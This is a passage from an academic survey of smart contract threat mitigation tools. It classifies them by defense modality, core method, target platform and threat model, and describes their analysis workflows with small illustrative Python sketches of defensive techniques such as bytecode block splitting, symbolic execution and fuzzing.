    Some threat mitigation solutions adhere to a hybrid detection+prevention modality, which means
that they can detect existing vulnerabilities, as well as enforce security properties. Securify [271]
not only checks the compliance with security patterns but also detects violations of patterns asso-
ciated with specific vulnerabilities, such as reentrancy and restricted transfer. Another threat mit-
igation solution with a hybrid detection+prevention modality is ModCon [196], which is a smart
contract testing tool that generates a list of states and transitions between these states, thereby en-
abling further identification of vulnerabilities and confirmation of security properties.
    Fig. 4.3a shows the breakdown of the three defense modalities among the 133 threat mitigation
solutions. As we can see, 81 (59.6%) of all the threat mitigation solutions employ the detection
modality, 44 (32.4%) use the prevention modality, and the remaining 11 (8.1%) belong to the
exploration modality. Some threat mitigation solutions exhibit a hybrid modality (e.g., DET+PR,
i.e., detection combined with prevention), in which case we identify and assume the predominant
modality for the statistical analysis, or we count both modalities in cases when it is impossible to
determine the predominant one. This explains the 136 total modalities considered, despite the fact
that they correspond to 133 threat mitigation solutions.
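The percentages above are shares of the 136 counted modality instances rather than of the 133 solutions. A short check of this arithmetic, using only the counts reported in the text (the variable names are ours):

```python
# Modality counts as reported for Fig. 4.3a (44 is the prevention modality).
counts = {"detection": 81, "prevention": 44, "exploration": 11}
solutions = 133

total = sum(counts.values())
shares = {name: round(100 * n / total, 1) for name, n in counts.items()}
double_counted = total - solutions  # hybrids without a predominant modality

print(total, shares, double_counted)
```

The difference between the two totals corresponds to the hybrid solutions for which both modalities were counted.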
4.4.2: Core Methods
The core method describes how a threat mitigation solution addresses the security issues of a smart
contract. In other words, the core method defines the implementation approach, choice of algo-
rithms, and internal data processing model of a threat mitigation solution. By scrutinizing all the
133 smart contract threat mitigation solutions, we identify eight distinct core methods: 1) static
analysis; 2) symbolic execution; 3) fuzzing; 4) formal analysis; 5) machine learning; 6) execution
tracing; 7) code synthesis; and 8) transaction interception.
    Static analysis solutions extract data from smart contracts in order to detect vulnerabilities or
confirm safety properties. Most static analysis solutions adhere to the detection modality (e.g., Se-
curify [271], S-GRAM [194], MadMax [133], SmartCheck [267]). However, some static analysis
solutions enforce policies instead of detecting vulnerabilities (e.g., solc-verify [141], BitML [58],
Gastap [49], Solicitous [204]). Moreover, we notice that the static analysis core method is often
coupled with some other methods. Solidity* [64], Amani et al. [52], Ethor [248], and sGUARD [220]
use static analysis together with formal analysis. Also, static analysis is often used together with the
symbolic execution core method, as we can see in HoneyBadger [270], MPro [304], SmarTest [260],
and Sailfish [70].
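As an illustration of what extracting data from a contract without executing it can look like, the sketch below performs a linear sweep over EVM bytecode and flags two sensitive opcodes. It is a deliberately naive example and not the algorithm of any surveyed tool; the function names and the choice of flagged opcodes are ours. The opcode values used (PUSH1 to PUSH32 as 0x60 to 0x7F, CALLER as 0x33, DELEGATECALL as 0xF4, SELFDESTRUCT as 0xFF) are the standard EVM encodings.

```python
FLAGGED = {0xF4: "DELEGATECALL", 0xFF: "SELFDESTRUCT"}  # illustrative choice


def disassemble(bytecode: bytes):
    """Yield (offset, opcode) pairs, skipping the immediate data of PUSH1..PUSH32."""
    pc = 0
    while pc < len(bytecode):
        op = bytecode[pc]
        yield pc, op
        if 0x60 <= op <= 0x7F:      # PUSH1..PUSH32 carry 1..32 bytes of data
            pc += op - 0x5F
        pc += 1


def scan(bytecode: bytes):
    """Return (offset, mnemonic) for every flagged opcode found in the code."""
    return [(pc, FLAGGED[op]) for pc, op in disassemble(bytecode) if op in FLAGGED]


# PUSH1 0xff; CALLER; SELFDESTRUCT. The 0xff at offset 1 is data, not code.
print(scan(bytes.fromhex("60ff33ff")))
```

Skipping PUSH immediates is the step that separates even a toy disassembler from a plain byte search, which would misreport the data byte at offset 1 as a SELFDESTRUCT instruction.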
    Symbolic execution methods execute a smart contract with symbolic parameters instead of concrete
ones in order to draw conclusions about some security properties of smart contracts (e.g.,
the range of values that make a certain condition true). Oyente [200], Mythril [215], Maian [223],
Manticore [214], ZEUS [168], Osiris [269], and teEther [178] are popular solutions employing the sym-
bolic execution core method. Similar to static analysis, symbolic execution is also often coupled
with other core methods. VerX [230] and Solar [116] use symbolic execution to guide code syn-
thesis. The solution by Hu et al. [152] takes advantage of both symbolic execution and machine
learning for detecting smart contract vulnerabilities.
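The idea of running code on a symbolic parameter can be shown with a toy explorer over a single unsigned input x. This is a sketch under strong simplifying assumptions: the program is a hypothetical tree of "x < c" branches, and the path condition is tracked as an interval instead of being passed to a constraint solver, which is what practical tools typically rely on.

```python
def explore(node, lo=0, hi=2**256 - 1, path=()):
    """Return (path, label, (lo, hi)) for every feasible path that reaches a bug.

    node is ("ok",), ("bug", label), or ("if_lt", c, then_node, else_node),
    where the last form branches on the condition x < c.
    """
    if lo > hi:                       # path condition unsatisfiable: prune
        return []
    if node[0] == "ok":
        return []
    if node[0] == "bug":
        return [(path, node[1], (lo, hi))]
    _, c, then_node, else_node = node
    return (explore(then_node, lo, min(hi, c - 1), path + (f"x < {c}",))
            + explore(else_node, max(lo, c), hi, path + (f"x >= {c}",)))


# Hypothetical program: one bug is guarded by contradictory conditions,
# the other is reachable exactly when 100 <= x < 200.
program = ("if_lt", 100,
           ("ok",),
           ("if_lt", 50,
            ("bug", "unreachable"),
            ("if_lt", 200, ("bug", "overdraw"), ("ok",))))

findings = explore(program)
print(findings)
```

The returned interval is the range of input values that make the path condition true, and any value inside it serves as a concrete witness for the reported path.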
    Fuzzing methods perform smart contract testing by iteratively generating test cases that are
likely to reveal vulnerabilities. ContractFuzzer [163] uses the application binary interface (ABI) of the
smart contract to facilitate the generation of fuzzing inputs. Harvey [291] is a smart contract tester
based on greybox fuzzing, which is a middle-ground solution between the absence of code analy-
sis (blackbox fuzzing) and full code execution (whitebox fuzzing); specifically, greybox fuzzing
assumes a lightweight (compared to symbolic execution) analysis of the code execution paths. Con-
Fuzzius [119] is a smart contract fuzzer that uses a combination of genetic algorithms and constraint
solving. Overall, fuzzing threat mitigation solutions utilize a diverse variety of predictive methods
for balancing accuracy and performance.
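The simplest point in this design space is blackbox random fuzzing, sketched below against a toy target with a planted bug. The target function, the oracle, and all names are hypothetical; surveyed fuzzers use far more elaborate input generation and feedback.

```python
import random


def withdraw(balance: int, amount: int) -> int:
    """Toy target: unchecked subtraction on an 8-bit balance (planted bug)."""
    return (balance - amount) % 256   # wraps around instead of rejecting


def fuzz(trials: int = 1000, seed: int = 0):
    """Blackbox random fuzzing: return the first input that violates the oracle."""
    rng = random.Random(seed)         # fixed seed keeps the run reproducible
    balance = 100
    for _ in range(trials):
        amount = rng.randrange(256)
        # Oracle: a withdrawal must never increase the balance.
        if withdraw(balance, amount) > balance:
            return amount
    return None


found = fuzz()
print(found)
```

Here the oracle is a single invariant; in practice, the choice of oracle determines which vulnerability classes a fuzzer can report at all.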
    Formal analysis methods convert a smart contract into a formal representation and run a solver
over this representation to prove or disprove some security properties. Most solutions employing
the formal analysis core method belong to either the prevention defense modality (e.g., Lolisa [294],
Model-Checking [217], Li et al. [186], Solidifier [54], VeriSol [283]) or the exploration modality
(e.g., KEVM [148], Grishchenko et al. [136]). However, SeRIF [83], whose primary purpose is
defense against reentrancy, demonstrates that formal analysis can also be used for detecting
vulnerabilities.
    Machine learning methods extract features from smart contracts and train models for detect-
ing vulnerabilities. The smart contract threat mitigation solutions utilizing the machine learning
core method are ContractWard [281], ESCORT [199], AMEVulDetector [197], and the solution by
Momeni et al. [212]. In Section 4.7.2, we conduct an in-depth discussion about the evolutionary
perspective of machine learning in smart contract security.
    Execution tracing and transaction interception core methods constitute the transaction-based
methods of smart contract threat mitigation. The execution tracing methods examine the runtime
traces of the actual transactions submitted to a smart contract in order to detect vulnerabilities, verify
safety properties, or facilitate manual auditing. TokenScope [96], EthScope [289], DEFIER [264],
Horus [120], BlockEye [276], and E-EVM [224] are instances of “pure” execution tracing methods (i.e.,
not combined with other methods).
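A minimal sketch of trace examination is given below. It assumes a hypothetical trace format in which each call event is recorded as a (depth, callee) pair in execution order, and it reports contracts that are entered again while an earlier call to them is still active. Real execution tracing tools work on much richer traces (storage accesses, value transfers, opcodes).

```python
def reentered(trace):
    """Return callees entered again while an earlier call to them is still active.

    trace: list of (depth, callee) call events in execution order.
    """
    stack, hits = [], []
    for depth, callee in trace:
        del stack[depth:]             # frames at this depth or deeper have returned
        if callee in stack:
            hits.append(callee)
        stack.append(callee)
    return hits


attack = [(0, "Attacker"), (1, "Bank"), (2, "Attacker"), (3, "Bank")]
benign = [(0, "Router"), (1, "Bank"), (1, "Token"), (2, "Bank")]

print(reentered(attack))
print(reentered(benign))
```

In the benign trace, Bank is called twice but never while one of its own frames is on the call stack, so nothing is reported. In the attack trace, both the callback into Attacker and the nested call into Bank are flagged; a practical tool would add further conditions before declaring an attack.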
    Code synthesis threat mitigation solutions aim at generating vulnerability-free smart contract
code resistant to attacks. Hydra [74] is a framework that generates bug bounties for smart contracts
using the N-of-N version programming (NNVP) principle. FSolidM [205] is a framework for de-
signing secure smart contracts as finite state machines (FSMs) and converting them into Solidity
code. Solythesis [183] is a source-to-source Solidity compiler that instruments the input source
code with additional instructions for validation of security-sensitive invariants.
    Transaction interception solutions dynamically observe the transaction pool of a blockchain
node in order to prevent the execution of malicious or unsafe transactions. These solutions are
represented by SODA [94], ÆGIS [117], and EVM* [203]. We also observe that execution tracing is often
combined with other core methods. Sereum [240] and ECFChecker [137] combine execution trac-
ing with transaction interception, while TxSpector [299] and the Ponzi scheme detection solution
by Chen et al. [97] combine execution tracing with static analysis.
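The interception step can be pictured as a policy filter placed between the transaction pool and execution. The sketch below is purely illustrative: the transaction fields, the two policies, and the blocklisted address are hypothetical and do not correspond to the interface of any surveyed tool.

```python
def intercept(pending, policies):
    """Split pending transactions into accepted hashes and rejected (hash, reasons)."""
    accepted, rejected = [], []
    for tx in pending:
        violated = [name for name, ok in policies.items() if not ok(tx)]
        if violated:
            rejected.append((tx["hash"], violated))
        else:
            accepted.append(tx["hash"])
    return accepted, rejected


BLOCKLIST = {"0xbad"}                 # hypothetical sender blocklist
policies = {
    "sender not blocklisted": lambda tx: tx["from"] not in BLOCKLIST,
    "value within cap": lambda tx: tx["value"] <= 10**18,
}
pending = [
    {"hash": "t1", "from": "0xabc", "value": 5},
    {"hash": "t2", "from": "0xbad", "value": 5},
    {"hash": "t3", "from": "0xabc", "value": 2 * 10**18},
]

accepted, rejected = intercept(pending, policies)
print(accepted, rejected)
```

Because the check runs before execution, a rejected transaction never changes contract state, which is what distinguishes interception from the after-the-fact analysis performed by execution tracing.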
    Fig. 4.3b shows the distribution of the eight core methods among the 133 threat mitigation
solutions. Specifically, we found 49 (35.3%) static analysis tools, 21 (15.1%) symbolic execution
methods, 15 (10.8%) fuzzing tools, 22 (15.8%) formal analysis tools, 5 (3.6%) machine learning
solutions, 11 (7.9%) execution tracing tools, 13 (9.4%) code synthesis tools, and 3 (2.2%)
transaction interceptors. Notably, some threat mitigation solutions employ a combination of the
aforementioned core methods; in this case, we recognize all the methods involved in Table 4.2, yet for
the purpose of counting and frequency analysis, we reduce the combination of core methods to
the predominant core method, if there is one. If it is impossible to identify the predominant core
method, we count all of them, which explains why the total count of instances of core methods
slightly exceeds the number of the threat mitigation solutions surveyed in this work.
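    The counting rule above can be checked with a few lines of arithmetic. The sketch below
takes the per-method counts from the text and recomputes the shares; it suggests that the
reported percentages are taken over the total number of counted method instances rather than
over the 133 surveyed solutions. The variable names are ours and purely illustrative.

```python
# Instance counts per core method, as reported in the text above.
core_method_counts = {
    "static analysis": 49,
    "symbolic execution": 21,
    "fuzzing": 15,
    "formal analysis": 22,
    "machine learning": 5,
    "execution tracing": 11,
    "code synthesis": 13,
    "transaction interception": 3,
}
SURVEYED_SOLUTIONS = 133

# Solutions without a predominant method are counted once per method,
# so the number of instances can exceed the number of solutions.
total_instances = sum(core_method_counts.values())
shares = {
    method: round(100 * count / total_instances, 1)
    for method, count in core_method_counts.items()
}

for method, share in shares.items():
    print(f"{method:26s}{core_method_counts[method]:4d}{share:7.1f}%")
print("instances:", total_instances, "solutions:", SURVEYED_SOLUTIONS)
```

Under this reading, the difference between the two totals is the number of extra instances
contributed by solutions for which no predominant core method could be identified.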
4.4.3: Targeted Contracts
Each of the threat mitigation solutions assumes a type of targeted smart contract. Some solutions
target general groups of smart contracts, such as Ethereum or even all possible contracts, while some
other solutions may target a single specific smart contract instance. Oyente [200], Mythril [215],
Securify [271], Sereum [240], Vandal [76], OpenZeppelin Contracts [33], MythX [31], Contract
Library [26], and many other popular threat mitigation solutions are strictly Ethereum-based. Some
solutions are EVM-compatible, which means that they are compatible with, but not limited to,
Ethereum smart contracts. SODA [94], VeriSol [283], and Javadity [46] are EVM-compatible
solutions. Some solutions are universal in terms of the scope of targeted contracts; although they
might not support every type of smart contract (e.g., the ones that are not Turing-complete), they
do not limit their scope to a specific group either. Such solutions are ModCon [196], Seraph [295],
SeRIF [83], EXGEN [166], and the information flow control solution by Cecchetti et al. [84]. Some
threat mitigation solutions target a specific non-Ethereum platform. BitML [58] targets Bitcoin
smart contract overlays, EOSAFE [147] targets the smart contracts on the EOS blockchain [27],
and HFContractFuzzer [108] targets the Hyperledger Fabric platform [53].
      To make sense of this diverse spectrum, we group the targeted smart contracts into four types.
Fig. 4.3c shows the distribution of different groups of targeted contracts among the threat mitigation
methods. Specifically, we discover that as many as 111 (83.5%) solutions target Ethereum contracts,
13 (9.8%) are suitable for any contract (including Ethereum, but not specifying it), 5 (3.8%) aim
for some non-Ethereum contracts (e.g., Hyperledger Fabric), and 4 (3.0%) target EVM-compatible
contracts (e.g., Polygon [34], RSK [35]).
4.4.4: Data Mapping
Next, we explore the design-specified inputs and outputs of each of the threat mitigation solu-
tions. Most smart contract threat mitigation solutions assume a smart contract as an input, either
as bytecode, source code, or as part of the chain data. Oyente [200], Mythril [215], Vandal [76],
ZEUS [168], teEther [178], and Osiris [269] are solutions that take bytecode as a smart contract in-
put. Hydra [74], S-GRAM [194], SmartCheck [267], VerX [230], VeriSmart [261], and SeRIF [83]
are solutions that assume source code as the input. Sereum [240], ECFChecker [137],
TokenScope [96], EasyFlow [127], TxSpector [299], and EthScope [289] are the threat mitigation
solutions that read smart contract information from the chain data, i.e., a stored copy of the blockchain.
      Some threat mitigation solutions use a combination of bytecode and source code as an input,
e.g., Securify37 [271], SAFEVM [48], Gastap [49], SafePay [188], and CPN [109]. Other solu-
tions, in addition to a smart contract, also take a set of manual specifications as an input, as we
   37
      Source code is optional in Securify.
see it in FSolidM [205], Model-Checking [217], VeriSolid [206], solc-verify [141], BitML [58],
SmartPulse [263], ESCORT [199], and ContractLarva [112]. Moreover, a smart contract is not
always used as an input of a threat mitigation solution. For instance, Flint [249], Solar [116], EVM-
Fuzzer [126], Findel [66], and the solution by Kongmanee et al. [177] assume a set of specifications
as the only input.
    Most threat mitigation solutions produce a human-readable report as an output, e.g., Oyente [200],
Mythril [215], Maian [223], Manticore [214], ZEUS [168], and Sereum [240]. However, some
solutions produce machine-readable metadata (e.g., a formal model) in lieu of a human-readable
report, which can be observed in Erays [310], the solution by Grishchenko et al. [136], the solution
by Momeni et al. [212], KSolidity [165], and the solution by Kongmanee et al. [177].
    Table 4.2 shows that the majority of the threat mitigation solutions (82.7%) produce a
human-readable report as an output, and for 78.2% of the solutions, the security report is the only output.
Notably, only 4 (3.0%) of all the threat mitigation solutions result in an action (e.g., stopping a
malicious transaction). This indicates the predominance of the static methodology in
smart contract defense, which is further discussed in Section 4.7.1.
    One important property of data mapping is that it often provides fine-tuned information that can-
not be inferred from the workflow of the corresponding core method. For example, the workflows
of smart contract threat mitigation solutions often specify “smart contract” as one of the inputs.
However, a smart contract can have several representations: source code, bytecode, deployed ad-
dress, etc. In this work, we extract the specific meaning of the “smart contract” and represent it
accordingly in the data mapping.
4.4.5: Threat Model
Finally, we describe all the threat mitigation solutions through the general description of their as-
sumed threat models. In other words, the threat model specifies the source of the threat, identifies
the victim(s), and defines the intent. We generalize all the threat models by subdividing them into
three major groups: victim contract, malicious contract, and hybrid malicious or victim contract.
Sereum [240], teEther [178], Hydra [74], Osiris [269], SODA [94], ÆGIS [117], EVMPatch [241],
SeRIF [83], and OpenZeppelin Contracts [33] are threat mitigation solutions with the vulnerable
contract threat model. Solutions with malicious contract threat models are the Ethereum honeypot
detector HoneyBadger [270], GASPER [95], and the social engineering attack detector by Ivanov et
al. [158]. Most threat mitigation solutions, however, are threat vector agnostic, i.e., they are capable
of defending against malicious smart contracts, as well as protecting vulnerable contracts. Secu-
rify [271], Oyente [200], ZEUS [168], SmartCheck [267], SmartPulse [263], SmarTest [260], and
MythX [31] are solutions with a bidirectional vector (malicious or victim contract) threat model.
     Fig. 4.3d shows the breakdown of different threat models among the threat mitigation methods.
We find that 41 (30.8%) methods assume vulnerable contracts, 7 (5.3%) imply the malicious con-
tract model, and 85 (63.9%) assume both these vectors. As we can see, the pure malicious smart
contract threat model is underrepresented among the threat mitigation solutions, which suggests that
attacks on smart contracts are generally perceived as more important than the cases of malicious
contracts attacking users. This finding is corroborated by the study by Zhou et al. [309], which
confirms that the popularity of the honeypot vulnerability, associated with the malicious smart con-
tract modality, is fourth after call injection, call-after-destruct, and airdrop-hunting vulnerabilities,
which all assume the victim smart contract threat model.
4.5: Design Workflows of Threat Mitigation Methods
In this section, we scrutinize the designs of the threat mitigation solutions by synthesizing the
uniform workflows for all the eight core methods, i.e., static analysis (Section 4.5.1), symbolic
execution (Section 4.5.2), fuzzing (Section 4.5.3), formal analysis (Section 4.5.4), machine learning
(Section 4.5.5), execution tracing (Section 4.5.6), code synthesis (Section 4.5.7), and transaction
interception (Section 4.5.8). Figs. 4.4–4.11 depict the workflows of the eight core methods. Each
of these eight workflows utilizes a set of uniform elements: modules, data entities, flows (arrows),
and environments. These uniform conventions allow us to concisely summarize and demystify the wide
variety of implementations of smart contract threat mitigation solutions.
    The modules (green rectangles) represent items that do something, i.e., algorithms, data filters,
etc. Modules can be mandatory, i.e., pertaining to any solution with the given core method (solid
borders) or optional/augmenting, i.e., implemented by some solutions employing the given core
method (dashed borders). The data entities (blue rectangles) represent pieces of data or abstract
data structures. The flows, depicted as arrows, show data or execution transitions. Environments
(red rectangles) allow grouping of certain elements into single logical modules.
Lessons Learned: By manually examining the workflows of all the 133 threat mitigation solutions,
we learned that every component exhibits a certain degree of generalization. For example, an
element called “smart contract” is a more general form of what could also be denoted as “source
code” or “bytecode”. Thus, one of the challenges we face when synthesizing the workflows is to
equate the generalizations of similar workflow elements.
4.5.1: Static Analysis Workflow
The static analysis methods apply automated data filtering and syntax analysis techniques to the
input. Static analysis methods detect vulnerabilities by extracting information (facts) from the
source code or bytecode of a smart contract. Fig. 4.4 shows the general workflow of static analysis
methods.
    The static analysis methods take bytecode (e.g., Erays [310], Vandal [76], MadMax [133]) or
source code (e.g., S-GRAM [194], SmartCheck [267], Slither [114]) of a smart contract as an input,
while some solutions also analyze previously executed transactions gathered from the chain data
(e.g., EasyFlow [127], Zhou et al. [309]). A large part of the static analysis process is devoted to
constructing a model in the form of one or a set of abstract data structures (ADS) that constitute
a suitable (and efficient) input for the static analyzer. Control flow graph (CFG) is a popular type
of such an ADS, which is utilized by Securify [271], Erays [310], and Vandal [76], to name a few.
The built model, data (in the form of some intermediate representation, e.g., a graph), and a set of
pre-defined or user-specified specifications are then directed to the static analyzer, which produces
a human-readable security assessment report.
                     Figure 4.4: Workflow of the static analysis core method.
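    To illustrate the model-construction step, the following minimal sketch splits EVM bytecode
into basic blocks, which is typically the first step towards a CFG. It is an illustration
under simplifying assumptions, not the algorithm of any tool cited above: it only finds block
boundaries and does not resolve jump targets into edges. The opcode values follow the EVM
instruction set; the function name `basic_blocks` is hypothetical.

```python
# Opcodes from the EVM instruction set that matter for block boundaries.
STOP, JUMP, JUMPI, JUMPDEST = 0x00, 0x56, 0x57, 0x5B
RETURN, REVERT, INVALID, SELFDESTRUCT = 0xF3, 0xFD, 0xFE, 0xFF
PUSH1, PUSH32 = 0x60, 0x7F
TERMINATORS = {STOP, JUMP, JUMPI, RETURN, REVERT, INVALID, SELFDESTRUCT}


def basic_blocks(code: bytes) -> list[tuple[int, int]]:
    """Return (start, end) byte offsets of basic blocks, end exclusive."""
    blocks, start, pc = [], 0, 0
    while pc < len(code):
        op = code[pc]
        if op == JUMPDEST and pc > start:
            blocks.append((start, pc))  # a jump target opens a new block
            start = pc
        # PUSHn carries n immediate bytes that must not be decoded as opcodes.
        pc += 1 + (op - PUSH1 + 1 if PUSH1 <= op <= PUSH32 else 0)
        if op in TERMINATORS:
            blocks.append((start, pc))  # control leaves the block here
            start = pc
    if start < len(code):
        blocks.append((start, len(code)))  # trailing block without terminator
    return blocks


# PUSH1 1; PUSH1 6; JUMPI; STOP; JUMPDEST; STOP
example = bytes.fromhex("6001600657005b00")
print(basic_blocks(example))
```

A static analyzer would then connect these blocks with edges (fall-through and resolved jump
targets) and run its fact extraction over the resulting graph.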
4.5.2: Symbolic Execution Workflow
Symbolic execution methods [174] simulate the execution of a smart contract in a way that the
actual inputs are replaced with special traceable symbolic parameters. Fig. 4.5 depicts the gen-
eral workflow of symbolic execution methodology. These methods use smart contract bytecode
and a set of specifications as an input. In some cases, the specifications are part of the tool (e.g.,
Oyente [200], Mythril [215], teEther [178], Osiris [269]), in other cases, the specifications are ex-
pected to be provided by the user (e.g., Maian [223]). Symbolic execution methods execute smart
contracts with traceable (symbolic) parameters in lieu of actual inputs, which makes it possible to prove or
disprove some presumptions about smart contracts. Specifically, symbolic execution can answer
questions about the possibility of execution of a certain block of code (reachability), the ability to
invoke a certain execution path, or the ability to satisfy certain constraints. Similar to static anal-
ysis, symbolic execution often involves building a search-efficient data structure, such as CFG, as
well as extracting facts and features from the input. However, unlike static analysis, the symbolic
execution methods run the code instead of analyzing its syntax. All the existing symbolic execution
solutions surveyed in this work employ the Z3 [43] SMT solver.
    Some symbolic execution solutions augment the basic design with additional features.
Oyente [200], teEther [178], SafePay [188], and Artemis [274] process the
smart contract to build a CFG. Another augmentation observed in symbolic execution solutions is
the production of exploits (sample inputs revealing vulnerabilities), as can be seen in teEther [178]
and EthBMC [122]. Moreover, some symbolic execution methods perform a preliminary analysis
(preprocessing) for generating guidance data facilitating the symbolic execution. SmarTest [260]
guides symbolic execution with a language-based model in order to achieve higher accuracy and
reduce the rate of timeouts.
                   Figure 4.5: Workflow of the symbolic execution core method.
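    The reachability question can be illustrated with a toy symbolic executor. The sketch below
is an assumption-laden simplification: it handles a single unsigned symbolic input, supports
only branch conditions of the form x >= k, and replaces the SMT solver with interval
intersection. The program encoding and all names are hypothetical; the surveyed tools operate
on EVM bytecode and delegate constraint solving to Z3.

```python
from dataclasses import dataclass

UINT256_MAX = 2**256 - 1


@dataclass(frozen=True)
class Interval:
    """Path condition over one symbolic input: lo <= x <= hi."""
    lo: int
    hi: int

    def intersect(self, other):
        lo, hi = max(self.lo, other.lo), min(self.hi, other.hi)
        return Interval(lo, hi) if lo <= hi else None  # None means unsatisfiable


def explore(node, path=Interval(0, UINT256_MAX)):
    """Yield (label, witness) for every leaf whose path condition is satisfiable."""
    if node[0] == "leaf":
        yield node[1], path.lo  # any value in the interval is a concrete witness
        return
    _, k, if_true, if_false = node  # branch on the condition x >= k
    taken = path.intersect(Interval(k, UINT256_MAX))
    if taken is not None:
        yield from explore(if_true, taken)
    if k > 0:
        skipped = path.intersect(Interval(0, k - 1))
        if skipped is not None:
            yield from explore(if_false, skipped)


# if x >= 101: (if x >= 50: large else: unreachable)
# else:        (if x >= 7: (if x >= 8: small else: seven) else: tiny)
program = ("branch", 101,
           ("branch", 50, ("leaf", "large"), ("leaf", "unreachable")),
           ("branch", 7,
            ("branch", 8, ("leaf", "small"), ("leaf", "seven")),
            ("leaf", "tiny")))

results = dict(explore(program))
print(results)
```

The leaf labeled "unreachable" never appears in the result because its path condition
(x >= 101 and x < 50) is unsatisfiable, while every reachable leaf comes with a concrete input
that drives execution to it.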
4.5.3: Fuzzing Workflow
Fuzzing methods use various techniques for generating subsets of test inputs that could reveal
vulnerable execution paths in smart contracts. Fig. 4.6 shows how the fuzzing core method works in
smart contracts. Fuzzing tools perform iterative testing of a smart contract by generating test cases
and adjusting these cases via a feedback loop. The execution of smart contracts is performed by
the fuzzing engine, which is either a stand-alone code interpreter or an instrumented (i.e., modified
with custom code) blockchain virtual machine. Fuzzing techniques help address two
notorious problems associated with software testing: input ranges and path explosion. Even a
single parameter of a smart contract function might exhibit a virtually endless range of actual values,
e.g., the 256-bit integer in Ethereum; so the goal of a fuzzing method is to pick input samples
that are likely to reveal vulnerabilities. The path explosion problem occurs when the user needs
to call a sequence of transactions. Even if the exact arguments are known in advance (which is
not always the case), the number of possible orders of transactions and other variable scenarios
“explodes” as the number of transactions in the sequence increases, which necessitates the use of
special techniques, such as pruning, by the fuzzing threat mitigation methods.
    Similar to symbolic execution, some fuzzing methods also utilize guidance data for facilitating
test case generation. ConFuzzius [119] performs preprocessing in the form of taint analysis in
order to guide the fuzzing engine. Also, in addition to identifying a problem in a smart contract, it
is common for a fuzzing solution to deliver proof of a vulnerability in the form of a sample malicious
transaction or a series thereof, as we see in ReGuard [193], SoliAudit [189], and EthPloit [303].
                          Figure 4.6: Workflow of the fuzzing core method.
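    The feedback loop described above can be sketched as a small coverage-guided fuzzer. This
is a minimal illustration under stated assumptions: `target` is a hypothetical Python stand-in
for a contract function, coverage is approximated by the label of the branch taken, and the
mutation operators (bit flips and off-by-one nudges) are chosen for brevity rather than taken
from any surveyed tool.

```python
import random

UINT256_MAX = 2**256 - 1


def target(amount: int, balance: int = 1000) -> str:
    """Hypothetical stand-in for a contract function; returns the branch taken."""
    if amount == 0:
        return "zero"
    if amount > balance:
        return "insufficient"
    if amount == balance:
        return "drain"
    return "ok"


def mutate(value: int, rng: random.Random) -> int:
    """Flip a random bit or nudge the value by one, wrapping within uint256."""
    if rng.random() < 0.5:
        value ^= 1 << rng.randrange(256)
    else:
        value += rng.choice((-1, 1))
    return value % (UINT256_MAX + 1)


def fuzz(seeds, rounds=2000, rng_seed=0):
    rng = random.Random(rng_seed)
    corpus = list(seeds)
    covered = {target(s) for s in corpus}
    for _ in range(rounds):
        candidate = mutate(rng.choice(corpus), rng)
        branch = target(candidate)
        if branch not in covered:  # feedback: keep inputs that add coverage
            covered.add(branch)
            corpus.append(candidate)
    return covered, corpus


covered, corpus = fuzz([0])
print(sorted(covered), len(corpus))
```

Each input retained in the corpus doubles as a concrete test case that reproduces the branch
it discovered, which mirrors how fuzzing tools can deliver sample transactions as proof of a
finding.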
4.5.4: Formal Analysis Workflow
Formal analysis methods convert smart contracts into formal representations and use automated
provers for deriving deterministic conclusions about the security properties of these smart con-
tracts. Fig. 4.7 depicts the workflow of the smart contract formal analysis core method. One impor-
tant component of a formal analysis solution is the fact extractor, which converts a smart contract
into a formal representation, usually in the form of a domain-specific language (DSL). The formal
representation is then delivered to an automated prover, such as Tamarin [208], along with some
specifications representing vulnerabilities or security properties. The prover then juxtaposes the
extracted facts with the provided properties to deliver a set of conclusions, which include compli-
ance and violation statements. The output of a formal analysis solution may be supplemented with
additional outputs. Specifically, some formal analysis solutions include the intermediate results
in the report, e.g., extracted semantics, as seen in KEVM [148]. Also, some solutions not only
prove existing theorems but also produce new theorems based on certain specifications,
as we can see in Lolisa [294].
                     Figure 4.7: Workflow of the formal analysis core method.
4.5.5: Machine Learning Workflow
Machine learning methods extract features from smart contracts or smart contract transactions and
train models for classifying smart contracts based on the types of vulnerabilities discovered in
them. Fig. 4.8 shows the general workflow of smart contract machine learning-based threat mit-
igation solutions. We discover that all the existing machine learning methods of smart contract
threat mitigation use supervised models, requiring a subset of labeled smart contract samples. The
workflow of a machine learning approach requires a data preprocessing (preparation) step, which
includes building a “clean” (uniform) dataset, creating training and testing samples, and performing
manual labeling (or reusing existing labels). The primary goal of the training step is to determine
the parameters of a chosen model. The goal of the testing step is to verify the robustness of the
model candidate. Once the model is trained and properly tested (e.g., using a K-fold method, as
observed in the evaluation part of SafelyAdministrated [156]), the model can detect vulnerabilities
or confirm the safety of the unlabeled contracts or smart contract transactions.
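    As an illustration of the K-fold testing step mentioned above, the sketch below generates
the train/test index splits. It is a generic, dependency-free version written for this
discussion, not the evaluation code of any cited solution; in practice the labeled samples
would usually be shuffled before splitting.

```python
def k_fold_indices(n_samples: int, k: int):
    """Yield (train_idx, test_idx) pairs; each sample is tested exactly once."""
    if not 2 <= k <= n_samples:
        raise ValueError("k must be between 2 and n_samples")
    # Spread the remainder over the first folds so sizes differ by at most one.
    fold_sizes = [n_samples // k + (1 if i < n_samples % k else 0) for i in range(k)]
    start = 0
    for size in fold_sizes:
        test = list(range(start, start + size))
        train = list(range(0, start)) + list(range(start + size, n_samples))
        yield train, test
        start += size


# Ten labeled contracts, three folds.
folds = list(k_fold_indices(10, 3))
for train, test in folds:
    print("train:", train, "test:", test)
```

The model is trained k times, each time on the `train` indices and evaluated on the held-out
`test` indices, and the per-fold scores are then averaged.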
    Feature extraction and model building are two major characteristics that describe machine learn-
ing threat mitigation solutions. Momeni et al. [212] deliver an ML model for detecting vulnerability
patterns in smart contracts, using an abstract syntax tree (AST) and control flow graph (CFG) for
feature extraction. ContractWard [281] approaches an ML-based detection of vulnerabilities in
smart contracts based on bigram features. ESCORT [199] is a machine learning smart contract
threat mitigation solution based on a deep neural network (DNN) with a semantic-based feature
extractor. AMEVulDetector [197] builds a semantic graph from the source code and applies deep
learning to building the vulnerability detection model.
                      Figure 4.8: Workflow of the machine learning core method.
4.5.6: Execution Tracing Workflow
Execution tracing methods assess the security properties of smart contracts by exploring the execu-
tion of transactions sent to a given smart contract or an externally owned account (in cases when
the Ethereum platform is targeted38 ). Fig. 4.9 depicts the workflow of execution tracing methods.
These solutions use transactions as their input. After that, the transactions are filtered to keep only
the ones associated with a specific account, specific smart contract, or a concrete action (e.g., at-
